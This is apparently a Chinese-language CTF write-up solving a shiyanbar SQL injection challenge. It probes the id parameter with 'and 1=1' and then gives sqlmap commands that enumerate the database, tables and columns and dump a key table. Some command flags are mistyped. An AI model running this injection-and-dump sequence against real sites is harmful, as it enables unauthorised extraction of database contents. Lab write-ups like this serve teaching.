名字叫做看起來比較簡單的一道（sqlmap）

來自專欄 不會開車的廚師不是好黑客

題目地址：www.shiyanbar.com/ctf/33

題目鏈接：http://ctf5.shiyanbar.com/8/index.php?id=1

點開題目的鏈接得到以下界面：

因為url中有?id=1的字樣，我們此時一下是否存在注入。（用 and 1=1 ,and1=2）

由於返回的結果不同，所以存在注入漏洞。

打開sqlmap，使用語句sqlmap –u http://www.shiyanbar.com/8/index?id=1 –current-db

可以看到我們找打資料庫，並且他的名字為my_db.

使用 sqlmap –u http://www.shiyanbar.com/8/index?id=1 –D my_db –table來獲取my_db資料庫中的表。

通過下圖可以看到發現my_db資料庫中的news thiskey 這兩個表。

使用sqlmap –u http://www.shiyanbar.com/8/index?id=1 D my_db –T thiskey –columns來獲取表thiskey中的列名。

可以看到K0y這個列

使用sqlmap –u http://www.shiyanbar.com/8/index?id=1 –D my_db –T thiskey –C k0y –dump來獲取其中的值。

得到k0y中的值。

提交其中的值，回答正確。